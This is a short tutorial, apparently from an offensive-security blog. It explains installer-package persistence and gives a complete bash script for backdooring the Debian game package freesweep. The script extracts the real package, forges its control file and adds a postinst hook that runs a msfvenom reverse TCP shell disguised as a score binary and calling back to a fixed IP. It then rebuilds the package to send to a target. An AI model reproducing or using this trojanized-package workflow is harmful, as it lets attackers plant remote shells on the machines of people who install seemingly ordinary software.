Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system.
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts.
First we need to locate a DEB package that we are going to infect with our payload will set everything in our temp folder, I've automated the process and built a small bash script to create the DEB file we send it to the user, and when the user installs
Build backdoor DEB:
sudo apt-get --download-only install freesweep
mkdir evil
sudo mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb /tmp/evil
cd evil
dpkg -x freesweep_1.0.2-1_amd64.deb work
mkdir work/DEBIAN
cd work/DEBIAN
# Define the content of the control file and create the file
cat <<EOL > control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
EOL
# Notify the user that the file has been created
echo "The control file has been created and populated."
# Now build a postinst file
cat <<EOL > postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
EOL
# Tell user files are built
echo "Files built successfuly"
# Build the payload
msfvenom --platform linux -a x64 --payload linux/x64/shell_reverse_tcp LHOST=10.10.1.133 LPORT=4444 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores
echo "Payload has been built"
# Change the values
chmod 755 postinst
# Build the package
dpkg-deb --build /tmp/evil/work
# Move back 2 directories
cd ../..
# Rename file to whatever "freesweep" here
mv work.deb freesweep.deb
echo "All files created send target file FREESWEEP.DEB"
